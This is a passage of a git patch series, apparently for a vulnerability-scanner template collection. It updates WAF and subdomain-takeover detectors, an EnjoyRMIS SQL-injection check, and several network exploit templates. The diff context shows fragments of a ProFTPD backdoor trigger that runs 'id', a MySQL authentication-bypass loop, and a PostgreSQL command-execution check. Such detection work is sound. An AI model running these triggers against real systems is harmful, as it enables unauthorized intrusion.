http/technologies/waf-detect.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/http/technologies/waf-detect.yaml b/http/technologies/waf-detect.yaml index 9a884f0dee..49b870cf3f 100644 --- a/http/technologies/waf-detect.yaml +++ b/http/technologies/waf-detect.yaml @@ -746,7 +746,7 @@ http: - '(?)content="CloudWAF"' - 'Server: CloudWAF' - 'Set-Cookie: HWWAFSESID=' - + - type: word name: safe3webfirewall part: header @@ -800,5 +800,4 @@ http: name: shieldonfirewall part: header words: - - "X-Protected-By: shieldon.io" - + - "X-Protected-By: shieldon.io" From e7fb3f4d4e94c1b4d949af8cf484b63d6edc434f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 Jul 2024 16:57:31 +0530 Subject: [PATCH 1073/1841] minor-update --- http/vulnerabilities/other/enjoyrmis-sqli.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/http/vulnerabilities/other/enjoyrmis-sqli.yaml b/http/vulnerabilities/other/enjoyrmis-sqli.yaml index 23aa923942..5a6407a5ad 100644 --- a/http/vulnerabilities/other/enjoyrmis-sqli.yaml +++ b/http/vulnerabilities/other/enjoyrmis-sqli.yaml @@ -5,11 +5,15 @@ info: author: securityforeveryone severity: high description: | - EnjoyRMIS is vulnerable to a SQL injection in the GetOAById SOAP endpoint. An attacker can exploit this to execute arbitrary SQL commands. + EnjoyRMIS GetOAById has a SQL injection vulnerability, through which an attacker can obtain sensitive database information and even control the server. reference: - https://github.com/wy876/POC/blob/main/EnjoyRMIS-GetOAById%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md metadata: fofa-query: body="CheckSilverlightInstalled" + verified: true + max-request: 1 + tags: enjoyrmis,sqli + http: - raw: - | @@ -31,5 +35,6 @@ http: - type: dsl dsl: - 'contains(body,"qqqzq1qvkqq")' + - 'contains(header,"text/xml")' - 'status_code == 500' condition: and From 92056317434d995056105d8a39e22805f42065d4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 10 Jul 2024 15:31:30 +0400 Subject: [PATCH 1074/1841] added new line --- http/takeovers/aftership-takeover.yaml | 1 + http/takeovers/agilecrm-takeover.yaml | 1 + http/takeovers/aha-takeover.yaml | 1 + http/takeovers/airee-takeover.yaml | 1 + http/takeovers/anima-takeover.yaml | 1 + http/takeovers/announcekit-takeover.yaml | 1 + http/takeovers/aws-bucket-takeover.yaml | 1 + http/takeovers/bigcartel-takeover.yaml | 1 + http/takeovers/bitbucket-takeover.yaml | 1 + http/takeovers/campaignmonitor-takeover.yaml | 1 + http/takeovers/canny-takeover.yaml | 1 + http/takeovers/cargo-takeover.yaml | 1 + http/takeovers/cargocollective-takeover.yaml | 1 + http/takeovers/clever-takeover.yaml | 1 + http/takeovers/flexbe-takeover.yaml | 1 + http/takeovers/frontify-takeover.yaml | 1 + http/takeovers/gemfury-takeover.yaml | 1 + http/takeovers/getresponse-takeover.yaml | 1 + http/takeovers/ghost-takeover.yaml | 1 + http/takeovers/gitbook-takeover.yaml | 1 + http/takeovers/github-takeover.yaml | 1 + http/takeovers/gohire-takeover.yaml | 1 + http/takeovers/hatenablog-takeover.yaml | 1 + http/takeovers/helpdocs-takeover.yaml | 1 + http/takeovers/helpjuice-takeover.yaml | 1 + http/takeovers/helprace-takeover.yaml | 1 + http/takeovers/helpscout-takeover.yaml | 1 + http/takeovers/hubspot-takeover.yaml | 1 + http/takeovers/intercom-takeover.yaml | 1 + http/takeovers/jazzhr-takeover.yaml | 1 + http/takeovers/jetbrains-takeover.yaml | 1 + http/takeovers/kinsta-takeover.yaml | 1 + http/takeovers/launchrock-takeover.yaml | 1 + http/takeovers/leadpages-takeover.yaml | 1 + http/takeovers/lemlist-takeover.yaml | 1 + http/takeovers/mashery-takeover.yaml | 1 + http/takeovers/meteor-takeover.yaml | 1 + http/takeovers/netlify-takeover.yaml | 1 + http/takeovers/ngrok-takeover.yaml | 1 + http/takeovers/pagewiz-takeover.yaml | 1 + http/takeovers/pantheon-takeover.yaml | 1 + http/takeovers/pingdom-takeover.yaml | 1 + http/takeovers/proposify-takeover.yaml | 1 + http/takeovers/readme-takeover.yaml | 1 + http/takeovers/readthedocs-takeover.yaml | 1 + http/takeovers/shopify-takeover.yaml | 1 + http/takeovers/short-io.yaml | 1 + http/takeovers/simplebooklet-takeover.yaml | 1 + http/takeovers/smartjob-takeover.yaml | 1 + http/takeovers/smugmug-takeover.yaml | 1 + http/takeovers/softr-takeover.yaml | 1 + http/takeovers/sprintful-takeover.yaml | 1 + http/takeovers/squadcast-takeover.yaml | 1 + http/takeovers/strikingly-takeover.yaml | 1 + http/takeovers/surge-takeover.yaml | 1 + http/takeovers/surveygizmo-takeover.yaml | 1 + http/takeovers/surveysparrow-takeover.yaml | 1 + http/takeovers/tave-takeover.yaml | 1 + http/takeovers/teamwork-takeover.yaml | 1 + http/takeovers/tilda-takeover.yaml | 1 + http/takeovers/tumblr-takeover.yaml | 1 + http/takeovers/uberflip-takeover.yaml | 1 + http/takeovers/uptime-takeover.yaml | 1 + http/takeovers/uptimerobot-takeover.yaml | 1 + http/takeovers/uservoice-takeover.yaml | 1 + http/takeovers/vend-takeover.yaml | 1 + http/takeovers/wishpond-takeover.yaml | 1 + http/takeovers/wix-takeover.yaml | 1 + http/takeovers/wordpress-takeover.yaml | 1 + http/takeovers/worksites-takeover.yaml | 1 + http/takeovers/wufoo-takeover.yaml | 1 + http/takeovers/zendesk-takeover.yaml | 1 + 72 files changed, 72 insertions(+) diff --git a/http/takeovers/aftership-takeover.yaml b/http/takeovers/aftership-takeover.yaml index 1e34571993..79e68bebf7 100644 --- a/http/takeovers/aftership-takeover.yaml +++ b/http/takeovers/aftership-takeover.yaml @@ -25,6 +25,7 @@ http: - type: word words: - Oops.

The page you're looking for doesn't exist. + extractors: - type: dsl dsl: diff --git a/http/takeovers/agilecrm-takeover.yaml b/http/takeovers/agilecrm-takeover.yaml index 2a02619a20..0e4fabd754 100644 --- a/http/takeovers/agilecrm-takeover.yaml +++ b/http/takeovers/agilecrm-takeover.yaml @@ -25,6 +25,7 @@ http: - type: word words: - Sorry, this page is no longer available. + extractors: - type: dsl dsl: diff --git a/http/takeovers/aha-takeover.yaml b/http/takeovers/aha-takeover.yaml index 572a6dbf2d..81952a086e 100644 --- a/http/takeovers/aha-takeover.yaml +++ b/http/takeovers/aha-takeover.yaml @@ -25,6 +25,7 @@ http: - type: word words: - There is no portal here ... sending you back to Aha! + extractors: - type: dsl dsl: diff --git a/http/takeovers/airee-takeover.yaml b/http/takeovers/airee-takeover.yaml index 9e78ac357e..2f0f3bfc3b 100644 --- a/http/takeovers/airee-takeover.yaml +++ b/http/takeovers/airee-takeover.yaml @@ -26,6 +26,7 @@ http: name: airee words: - 'Ошибка 402. Сервис Айри.рф не оплачен' + extractors: - type: dsl dsl: diff --git a/http/takeovers/anima-takeover.yaml b/http/takeovers/anima-takeover.yaml index f86d22c26e..e980c1055c 100644 --- a/http/takeovers/anima-takeover.yaml +++ b/http/takeovers/anima-takeover.yaml @@ -25,6 +25,7 @@ http: - type: word words: - "If this is your website and you've just created it, try refreshing in a minute" + extractors: - type: dsl dsl: diff --git a/http/takeovers/announcekit-takeover.yaml b/http/takeovers/announcekit-takeover.yaml index 759e8f9245..7fa4470353 100644 --- a/http/takeovers/announcekit-takeover.yaml +++ b/http/takeovers/announcekit-takeover.yaml @@ -30,6 +30,7 @@ http: - type: status status: - 404 + extractors: - type: dsl dsl: diff --git a/http/takeovers/aws-bucket-takeover.yaml b/http/takeovers/aws-bucket-takeover.yaml index d4862198c0..5463e71682 100644 --- a/http/takeovers/aws-bucket-takeover.yaml +++ b/http/takeovers/aws-bucket-takeover.yaml @@ -71,6 +71,7 @@ http: - "oss-me-east-1.aliyuncs.com" negative: true + extractors: - type: regex part: body diff --git a/http/takeovers/bigcartel-takeover.yaml b/http/takeovers/bigcartel-takeover.yaml index dacbaa9c98..84a9ff9ee2 100644 --- a/http/takeovers/bigcartel-takeover.yaml +++ b/http/takeovers/bigcartel-takeover.yaml @@ -29,6 +29,7 @@ http: - type: dsl dsl: - '!contains(host,"bigcartel.com")' + extractors: - type: dsl dsl: diff --git a/http/takeovers/bitbucket-takeover.yaml b/http/takeovers/bitbucket-takeover.yaml index 4ea261716e..8b260b0608 100644 --- a/http/takeovers/bitbucket-takeover.yaml +++ b/http/takeovers/bitbucket-takeover.yaml @@ -31,6 +31,7 @@ http: words: - "text/plain" part: header + extractors: - type: dsl dsl: diff --git a/http/takeovers/campaignmonitor-takeover.yaml b/http/takeovers/campaignmonitor-takeover.yaml index 6cad5229d7..8fec07b82d 100644 --- a/http/takeovers/campaignmonitor-takeover.yaml +++ b/http/takeovers/campaignmonitor-takeover.yaml @@ -27,6 +27,7 @@ http: - 'Trying to access your account?' - 'or ' - '404 Not Found
' condition: and + extractors: - type: dsl dsl: diff --git a/http/takeovers/clever-takeover.yaml b/http/takeovers/clever-takeover.yaml index b063842f8a..7769dfb19f 100644 --- a/http/takeovers/clever-takeover.yaml +++ b/http/takeovers/clever-takeover.yaml @@ -28,6 +28,7 @@ http: - "The application you're trying to access doesn't seem to exist" - "support@clever-cloud.com" condition: and + extractors: - type: dsl dsl: diff --git a/http/takeovers/flexbe-takeover.yaml b/http/takeovers/flexbe-takeover.yaml index 483c612016..dfebb6d357 100644 --- a/http/takeovers/flexbe-takeover.yaml +++ b/http/takeovers/flexbe-takeover.yaml @@ -32,6 +32,7 @@ http: - type: status status: - 404 + extractors: - type: dsl dsl: diff --git a/http/takeovers/frontify-takeover.yaml b/http/takeovers/frontify-takeover.yaml index 4567d426d7..3d2cb9bf77 100644 --- a/http/takeovers/frontify-takeover.yaml +++ b/http/takeovers/frontify-takeover.yaml @@ -27,6 +27,7 @@ http: - 404 - Page Not Found - Oops… looks like you got lost condition: and + extractors: - type: dsl dsl: diff --git a/http/takeovers/gemfury-takeover.yaml b/http/takeovers/gemfury-takeover.yaml index 0efaba4e07..8452f9c9c7 100644 --- a/http/takeovers/gemfury-takeover.yaml +++ b/http/takeovers/gemfury-takeover.yaml @@ -29,6 +29,7 @@ http: part: header words: - "Location: https://gemfury.com/404" + extractors: - type: dsl dsl: diff --git a/http/takeovers/getresponse-takeover.yaml b/http/takeovers/getresponse-takeover.yaml index 001b02b48f..754e5764a7 100644 --- a/http/takeovers/getresponse-takeover.yaml +++ b/http/takeovers/getresponse-takeover.yaml @@ -25,6 +25,7 @@ http: - type: word words: - 'With GetResponse Landing Pages, lead generation has never been easier' + extractors: - type: dsl dsl: diff --git a/http/takeovers/ghost-takeover.yaml b/http/takeovers/ghost-takeover.yaml index 77a5952d0e..273c0bda41 100644 --- a/http/takeovers/ghost-takeover.yaml +++ b/http/takeovers/ghost-takeover.yaml @@ -30,6 +30,7 @@ http: - type: status status: - 302 + extractors: - type: dsl dsl: diff --git a/http/takeovers/gitbook-takeover.yaml b/http/takeovers/gitbook-takeover.yaml index 405630fa4d..dfed33fceb 100644 --- a/http/takeovers/gitbook-takeover.yaml +++ b/http/takeovers/gitbook-takeover.yaml @@ -28,6 +28,7 @@ http: - "If you need specifics, here's the error" - "Domain not found" condition: and + extractors: - type: dsl dsl: diff --git a/http/takeovers/github-takeover.yaml b/http/takeovers/github-takeover.yaml index a498fec827..843319f89b 100644 --- a/http/takeovers/github-takeover.yaml +++ b/http/takeovers/github-takeover.yaml @@ -34,6 +34,7 @@ http: - '!contains(host,"github.com")' - '!contains(host,"github.io")' condition: and + extractors: - type: dsl dsl: diff --git a/http/takeovers/gohire-takeover.yaml b/http/takeovers/gohire-takeover.yaml index f9fa0804ab..73d2a646a9 100644 --- a/http/takeovers/gohire-takeover.yaml +++ b/http/takeovers/gohire-takeover.yaml @@ -29,6 +29,7 @@ http: - type: status status: - 404 + extractors: - type: dsl dsl: diff --git a/http/takeovers/hatenablog-takeover.yaml b/http/takeovers/hatenablog-takeover.yaml index f565259972..8a9ee5c09a 100644 --- a/http/takeovers/hatenablog-takeover.yaml +++ b/http/takeovers/hatenablog-takeover.yaml @@ -26,6 +26,7 @@ http: - type: word words: - "404 Blog is not found" + extractors: - type: dsl dsl: diff --git a/http/takeovers/helpdocs-takeover.yaml b/http/takeovers/helpdocs-takeover.yaml index e0c16a0579..75928be65a 100644 --- a/http/takeovers/helpdocs-takeover.yaml +++ b/http/takeovers/helpdocs-takeover.yaml @@ -28,6 +28,7 @@ http: part: body words: - "You've tried to access an account/page that does not exist" + extractors: - type: dsl dsl: diff --git a/http/takeovers/helpjuice-takeover.yaml b/http/takeovers/helpjuice-takeover.yaml index 2f1a344c6f..df1b6ea532 100644 --- a/http/takeovers/helpjuice-takeover.yaml +++ b/http/takeovers/helpjuice-takeover.yaml @@ -25,6 +25,7 @@ http: - type: word words: - We could not find what you're looking for. + extractors: - type: dsl dsl: diff --git a/http/takeovers/helprace-takeover.yaml b/http/takeovers/helprace-takeover.yaml index 0ee389a95a..815cc43c5e 100644 --- a/http/takeovers/helprace-takeover.yaml +++ b/http/takeovers/helprace-takeover.yaml @@ -26,6 +26,7 @@ http: words: - "Alias not configured!" - "Admin of this Helprace account needs to set up domain alias" + extractors: - type: dsl dsl: diff --git a/http/takeovers/helpscout-takeover.yaml b/http/takeovers/helpscout-takeover.yaml index 9af30103ce..a11159e4ff 100644 --- a/http/takeovers/helpscout-takeover.yaml +++ b/http/takeovers/helpscout-takeover.yaml @@ -25,6 +25,7 @@ http: - type: word words: - "No settings were found for this company:" + extractors: - type: dsl dsl: diff --git a/http/takeovers/hubspot-takeover.yaml b/http/takeovers/hubspot-takeover.yaml index b6f49b9ced..7846134595 100644 --- a/http/takeovers/hubspot-takeover.yaml +++ b/http/takeovers/hubspot-takeover.yaml @@ -28,6 +28,7 @@ http: - "Domain not found" - "does not exist in our system" condition: and + extractors: - type: dsl dsl: diff --git a/http/takeovers/intercom-takeover.yaml b/http/takeovers/intercom-takeover.yaml index 43b122d366..37d8705d10 100644 --- a/http/takeovers/intercom-takeover.yaml +++ b/http/takeovers/intercom-takeover.yaml @@ -27,6 +27,7 @@ http: - '

Uh oh. That page doesn\’t exist.

' - 'This page is reserved for artistic dogs.' condition: and + extractors: - type: dsl dsl: diff --git a/http/takeovers/jazzhr-takeover.yaml b/http/takeovers/jazzhr-takeover.yaml index 7ff0e10e14..7178555184 100644 --- a/http/takeovers/jazzhr-takeover.yaml +++ b/http/takeovers/jazzhr-takeover.yaml @@ -25,6 +25,7 @@ http: - type: word words: - This account no longer active + extractors: - type: dsl dsl: diff --git a/http/takeovers/jetbrains-takeover.yaml b/http/takeovers/jetbrains-takeover.yaml index ad59f64184..7d95fcce4c 100644 --- a/http/takeovers/jetbrains-takeover.yaml +++ b/http/takeovers/jetbrains-takeover.yaml @@ -25,6 +25,7 @@ http: - type: word words: - is not a registered InCloud YouTrack. + extractors: - type: dsl dsl: diff --git a/http/takeovers/kinsta-takeover.yaml b/http/takeovers/kinsta-takeover.yaml index 2f7370a70a..4b9bf843f8 100644 --- a/http/takeovers/kinsta-takeover.yaml +++ b/http/takeovers/kinsta-takeover.yaml @@ -25,6 +25,7 @@ http: - type: word words: - No Site For Domain + extractors: - type: dsl dsl: diff --git a/http/takeovers/launchrock-takeover.yaml b/http/takeovers/launchrock-takeover.yaml index df86ba8d47..2aa98cacae 100644 --- a/http/takeovers/launchrock-takeover.yaml +++ b/http/takeovers/launchrock-takeover.yaml @@ -25,6 +25,7 @@ http: - type: word words: - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens to all of us. + extractors: - type: dsl dsl: diff --git a/http/takeovers/leadpages-takeover.yaml b/http/takeovers/leadpages-takeover.yaml index bb125f091a..ff3931e779 100644 --- a/http/takeovers/leadpages-takeover.yaml +++ b/http/takeovers/leadpages-takeover.yaml @@ -30,6 +30,7 @@ http: - "The page you’re looking for may have been moved" - "Double-check that you have the right web address and give it another go!" condition: or + extractors: - type: dsl dsl: diff --git a/http/takeovers/lemlist-takeover.yaml b/http/takeovers/lemlist-takeover.yaml index 36a13a7ad7..c964774f28 100644 --- a/http/takeovers/lemlist-takeover.yaml +++ b/http/takeovers/lemlist-takeover.yaml @@ -29,6 +29,7 @@ http: - "Custom domain check" - "app.lemlist.com" condition: and + extractors: - type: dsl dsl: diff --git a/http/takeovers/mashery-takeover.yaml b/http/takeovers/mashery-takeover.yaml index 487b784b05..dbb0dacb6a 100644 --- a/http/takeovers/mashery-takeover.yaml +++ b/http/takeovers/mashery-takeover.yaml @@ -25,6 +25,7 @@ http: - type: word words: - Unrecognized domain + extractors: - type: dsl dsl: diff --git a/http/takeovers/meteor-takeover.yaml b/http/takeovers/meteor-takeover.yaml index c7fc0403e5..1928245b3e 100644 --- a/http/takeovers/meteor-takeover.yaml +++ b/http/takeovers/meteor-takeover.yaml @@ -21,6 +21,7 @@ http: - type: word words: - "404 Not Found: No applications registered for host '" + extractors: - type: dsl dsl: diff --git a/http/takeovers/netlify-takeover.yaml b/http/takeovers/netlify-takeover.yaml index 70fd7b5e75..65be0aeabc 100644 --- a/http/takeovers/netlify-takeover.yaml +++ b/http/takeovers/netlify-takeover.yaml @@ -34,6 +34,7 @@ http: part: header words: - "Netlify" + extractors: - type: dsl dsl: diff --git a/http/takeovers/ngrok-takeover.yaml b/http/takeovers/ngrok-takeover.yaml index fdebc35df4..0e23589bf1 100644 --- a/http/takeovers/ngrok-takeover.yaml +++ b/http/takeovers/ngrok-takeover.yaml @@ -26,6 +26,7 @@ http: words: - ngrok.io not found - Tunnel *.ngrok.io not found + extractors: - type: dsl dsl: diff --git a/http/takeovers/pagewiz-takeover.yaml b/http/takeovers/pagewiz-takeover.yaml index 654b0f9ebc..d25de8b47b 100644 --- a/http/takeovers/pagewiz-takeover.yaml +++ b/http/takeovers/pagewiz-takeover.yaml @@ -28,6 +28,7 @@ http: - 'Start Your New Landing Page Now!' - 'pagewiz' condition: and + extractors: - type: dsl dsl: diff --git a/http/takeovers/pantheon-takeover.yaml b/http/takeovers/pantheon-takeover.yaml index 0bdbeda05b..388d3e438a 100644 --- a/http/takeovers/pantheon-takeover.yaml +++ b/http/takeovers/pantheon-takeover.yaml @@ -30,6 +30,7 @@ http: - type: dsl dsl: - '!contains(host,"apigee.io")' + extractors: - type: dsl dsl: diff --git a/http/takeovers/pingdom-takeover.yaml b/http/takeovers/pingdom-takeover.yaml index 5d36047977..ee4ff07a60 100644 --- a/http/takeovers/pingdom-takeover.yaml +++ b/http/takeovers/pingdom-takeover.yaml @@ -26,6 +26,7 @@ http: words: - Public Report Not Activated - This public report page has not been activated by the user + extractors: - type: dsl dsl: diff --git a/http/takeovers/proposify-takeover.yaml b/http/takeovers/proposify-takeover.yaml index 9f3c25933c..350794754d 100644 --- a/http/takeovers/proposify-takeover.yaml +++ b/http/takeovers/proposify-takeover.yaml @@ -25,6 +25,7 @@ http: - type: word words: - If you need immediate assistance, please contact Error 404: Page Not Found" + extractors: - type: dsl dsl: diff --git a/http/takeovers/teamwork-takeover.yaml b/http/takeovers/teamwork-takeover.yaml index c14a74f9e6..d6e50531e4 100644 --- a/http/takeovers/teamwork-takeover.yaml +++ b/http/takeovers/teamwork-takeover.yaml @@ -23,6 +23,7 @@ http: - type: word words: - "Oops - We didn't find your site." + extractors: - type: dsl dsl: diff --git a/http/takeovers/tilda-takeover.yaml b/http/takeovers/tilda-takeover.yaml index 21521689c4..bd59df48bd 100644 --- a/http/takeovers/tilda-takeover.yaml +++ b/http/takeovers/tilda-takeover.yaml @@ -30,6 +30,7 @@ http: words: - "Please renew your subscription" negative: true + extractors: - type: dsl dsl: diff --git a/http/takeovers/tumblr-takeover.yaml b/http/takeovers/tumblr-takeover.yaml index 71f60f4d4f..2e3e38460c 100644 --- a/http/takeovers/tumblr-takeover.yaml +++ b/http/takeovers/tumblr-takeover.yaml @@ -34,6 +34,7 @@ http: - '!contains(host,"txmblr.com")' - '!contains(host,"umblr.com")' condition: and + extractors: - type: dsl dsl: diff --git a/http/takeovers/uberflip-takeover.yaml b/http/takeovers/uberflip-takeover.yaml index 6d473d7470..7a8261d210 100644 --- a/http/takeovers/uberflip-takeover.yaml +++ b/http/takeovers/uberflip-takeover.yaml @@ -26,6 +26,7 @@ http: - type: word words: - "Non-hub domain, The URL you've accessed does not provide a hub." + extractors: - type: dsl dsl: diff --git a/http/takeovers/uptime-takeover.yaml b/http/takeovers/uptime-takeover.yaml index 2671073563..65a4d0f8a7 100644 --- a/http/takeovers/uptime-takeover.yaml +++ b/http/takeovers/uptime-takeover.yaml @@ -29,6 +29,7 @@ http: - type: status status: - 302 + extractors: - type: dsl dsl: diff --git a/http/takeovers/uptimerobot-takeover.yaml b/http/takeovers/uptimerobot-takeover.yaml index c69be58a15..7a8bed71a3 100644 --- a/http/takeovers/uptimerobot-takeover.yaml +++ b/http/takeovers/uptimerobot-takeover.yaml @@ -36,6 +36,7 @@ http: - type: status status: - 404 + extractors: - type: dsl dsl: diff --git a/http/takeovers/uservoice-takeover.yaml b/http/takeovers/uservoice-takeover.yaml index 174b24bcfd..84ea090e7d 100644 --- a/http/takeovers/uservoice-takeover.yaml +++ b/http/takeovers/uservoice-takeover.yaml @@ -26,6 +26,7 @@ http: - type: word words: - "This UserVoice subdomain is currently available!" + extractors: - type: dsl dsl: diff --git a/http/takeovers/vend-takeover.yaml b/http/takeovers/vend-takeover.yaml index 5413b0d8c1..c831d2ec84 100644 --- a/http/takeovers/vend-takeover.yaml +++ b/http/takeovers/vend-takeover.yaml @@ -25,6 +25,7 @@ http: - type: word words: - Looks like you've traveled too far into cyberspace. + extractors: - type: dsl dsl: diff --git a/http/takeovers/wishpond-takeover.yaml b/http/takeovers/wishpond-takeover.yaml index d2b7d2d6af..18b4a721ad 100644 --- a/http/takeovers/wishpond-takeover.yaml +++ b/http/takeovers/wishpond-takeover.yaml @@ -27,6 +27,7 @@ http: - https://www.wishpond.com/404?campaign=true - 'Oops! There isn’t a Wishpond Campaign published to this page.' condition: or + extractors: - type: dsl dsl: diff --git a/http/takeovers/wix-takeover.yaml b/http/takeovers/wix-takeover.yaml index 5ff101bc81..9c854dbb73 100644 --- a/http/takeovers/wix-takeover.yaml +++ b/http/takeovers/wix-takeover.yaml @@ -31,6 +31,7 @@ http: - type: status status: - 404 + extractors: - type: dsl dsl: diff --git a/http/takeovers/wordpress-takeover.yaml b/http/takeovers/wordpress-takeover.yaml index 5b67fff0da..a3930f9ff1 100644 --- a/http/takeovers/wordpress-takeover.yaml +++ b/http/takeovers/wordpress-takeover.yaml @@ -33,6 +33,7 @@ http: words: - "cannot be registered" negative: true + extractors: - type: dsl dsl: diff --git a/http/takeovers/worksites-takeover.yaml b/http/takeovers/worksites-takeover.yaml index fd0d2e0894..eb5ac78e5f 100644 --- a/http/takeovers/worksites-takeover.yaml +++ b/http/takeovers/worksites-takeover.yaml @@ -43,6 +43,7 @@ http: - type: status status: - 404 + extractors: - type: dsl dsl: diff --git a/http/takeovers/wufoo-takeover.yaml b/http/takeovers/wufoo-takeover.yaml index d91a0646af..2d098767a6 100644 --- a/http/takeovers/wufoo-takeover.yaml +++ b/http/takeovers/wufoo-takeover.yaml @@ -27,6 +27,7 @@ http: - Profile not found - Hmmm....something is not right. condition: and + extractors: - type: dsl dsl: diff --git a/http/takeovers/zendesk-takeover.yaml b/http/takeovers/zendesk-takeover.yaml index c71458acda..4a29a339c1 100644 --- a/http/takeovers/zendesk-takeover.yaml +++ b/http/takeovers/zendesk-takeover.yaml @@ -29,6 +29,7 @@ http: - "this help center no longer exists" - "Help Center Closed" condition: or + extractors: - type: dsl dsl: From adcff81246a32d5fd54cfb57f7abe1f07855919a Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 10 Jul 2024 17:38:01 +0530 Subject: [PATCH 1075/1841] JS pre-condition - update --- javascript/audit/mysql/mysql-load-file.yaml | 5 ++++- javascript/backdoor/proftpd-backdoor.yaml | 5 ++++- javascript/cves/2012/CVE-2012-2122.yaml | 5 ++++- javascript/cves/2016/CVE-2016-8706.yaml | 5 ++++- javascript/cves/2019/CVE-2019-9193.yaml | 5 ++++- javascript/cves/2020/CVE-2020-7247.yaml | 5 ++++- javascript/cves/2023/CVE-2023-46604.yaml | 4 +++- javascript/cves/2023/CVE-2023-48795.yaml | 5 ++++- javascript/cves/2024/CVE-2024-23897.yaml | 4 +++- javascript/default-logins/redis-default-logins.yaml | 1 + javascript/detection/oracle-tns-listener.yaml | 4 +++- javascript/detection/samba-detect.yaml | 4 +++- javascript/detection/ssh-auth-methods.yaml | 4 +++- javascript/enumeration/checkpoint-firewall-enum.yaml | 4 +++- javascript/enumeration/ldap/ldap-metadata.yaml | 4 +++- javascript/enumeration/mysql/mysql-default-login.yaml | 5 +---- javascript/enumeration/mysql/mysql-info.yaml | 5 ++++- javascript/enumeration/mysql/mysql-show-databases.yaml | 4 +++- javascript/enumeration/mysql/mysql-show-variables.yaml | 4 +++- javascript/enumeration/mysql/mysql-user-enum.yaml | 5 ++++- javascript/enumeration/pgsql/pgsql-default-db.yaml | 5 ++--- javascript/enumeration/pgsql/pgsql-file-read.yaml | 4 +--- javascript/enumeration/pgsql/pgsql-list-database.yaml | 4 +--- javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml | 4 +--- javascript/enumeration/pgsql/pgsql-list-users.yaml | 4 +--- javascript/enumeration/pgsql/pgsql-version-detect.yaml | 5 ++--- javascript/enumeration/pop3/pop3-capabilities-enum.yaml | 5 ++++- javascript/enumeration/redis/redis-info.yaml | 5 ++++- javascript/enumeration/redis/redis-require-auth.yaml | 5 ++++- javascript/enumeration/rsync/rsync-list-modules.yaml | 5 ++++- javascript/enumeration/rsync/rsync-version.yaml | 4 +++- javascript/enumeration/smb/smb-default-creds.yaml | 5 ++++- javascript/enumeration/smb/smb-enum-domains.yaml | 5 ++++- javascript/enumeration/smb/smb-enum.yaml | 5 ++++- javascript/enumeration/smb/smb-os-detect.yaml | 5 ++++- javascript/enumeration/smb/smb-version-detect.yaml | 5 ++++- javascript/enumeration/smb/smb2-capabilities.yaml | 5 ++++- javascript/enumeration/smb/smb2-server-time.yaml | 5 ++++- javascript/misconfiguration/mysql/mysql-empty-password.yaml | 5 +---- javascript/misconfiguration/pgsql/pgsql-empty-password.yaml | 5 ++++- javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml | 4 +++- javascript/misconfiguration/smb/smb-anonymous-access.yaml | 4 +++- javascript/misconfiguration/smb/smb-shares.yaml | 4 +++- .../misconfiguration/smb/smb-signing-not-required.yaml | 4 +++- javascript/udp/detection/tftp-detect.yaml | 4 +++- 45 files changed, 140 insertions(+), 62 deletions(-) diff --git a/javascript/audit/mysql/mysql-load-file.yaml b/javascript/audit/mysql/mysql-load-file.yaml index 2b767b2605..4d02114000 100644 --- a/javascript/audit/mysql/mysql-load-file.yaml +++ b/javascript/audit/mysql/mysql-load-file.yaml @@ -12,8 +12,11 @@ info: max-request: 16 shodan-query: "port:3306" tags: js,mysql,network,audit + javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | let m = require('nuclei/mysql'); let c = m.MySQLClient(); let response = c.ExecuteQuery(Host,Port,User,Pass,Query); diff --git a/javascript/backdoor/proftpd-backdoor.yaml b/javascript/backdoor/proftpd-backdoor.yaml index 85cea61ff4..0565b6dec5 100644 --- a/javascript/backdoor/proftpd-backdoor.yaml +++ b/javascript/backdoor/proftpd-backdoor.yaml @@ -13,8 +13,11 @@ info: max-request: 1 shodan-query: "product:\"ProFTPD\"" tags: js,network,proftpd,ftp,backdoor + javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | const data = ["HELP ACIDBITCHEZ\n", "id"]; const c = require("nuclei/net"); let conn = c.Open('tcp', `${Host}:${Port}`); diff --git a/javascript/cves/2012/CVE-2012-2122.yaml b/javascript/cves/2012/CVE-2012-2122.yaml index e97f14c92e..9226beb40e 100644 --- a/javascript/cves/2012/CVE-2012-2122.yaml +++ b/javascript/cves/2012/CVE-2012-2122.yaml @@ -29,8 +29,11 @@ info: - "product:\"MySQL\"" - product:"mysql" tags: cve,cve2012,js,enum,network,mssql,fuzz,oracle + javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | const mysql = require('nuclei/mysql'); const client = new mysql.MySQLClient; for (let i = 1; i <= 1001; i++) { diff --git a/javascript/cves/2016/CVE-2016-8706.yaml b/javascript/cves/2016/CVE-2016-8706.yaml index 0730a6857e..1fb22d6a0d 100644 --- a/javascript/cves/2016/CVE-2016-8706.yaml +++ b/javascript/cves/2016/CVE-2016-8706.yaml @@ -26,8 +26,11 @@ info: product: memcached verfied: true tags: cve,cve2016,rce,js,memcached + javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | let packet = bytes.NewBuffer(); packet.Write(new Uint8Array([0x80, 0x21])) let cmd = 'stats' diff --git a/javascript/cves/2019/CVE-2019-9193.yaml b/javascript/cves/2019/CVE-2019-9193.yaml index bdfb0d611c..b7d4130a42 100644 --- a/javascript/cves/2019/CVE-2019-9193.yaml +++ b/javascript/cves/2019/CVE-2019-9193.yaml @@ -13,8 +13,11 @@ info: max-request: 1 shodan-query: "product:\"PostgreSQL\"" tags: cve,cve2018,js,network,postgresql,intrusive + javascript: - - code: | + - pre-condition: | + isPortOpen(Host,Port); + code: | const postgres = require('nuclei/postgres'); const client = new postgres.PGClient; const tbl = tbl_exec diff --git a/javascript/cves/2020/CVE-2020-7247.yaml b/javascript/cves/2020/CVE-2020-7247.yaml index 82674b24fa..b4f440fb83 100644 --- a/javascript/cves/2020/CVE-2020-7247.yaml +++ 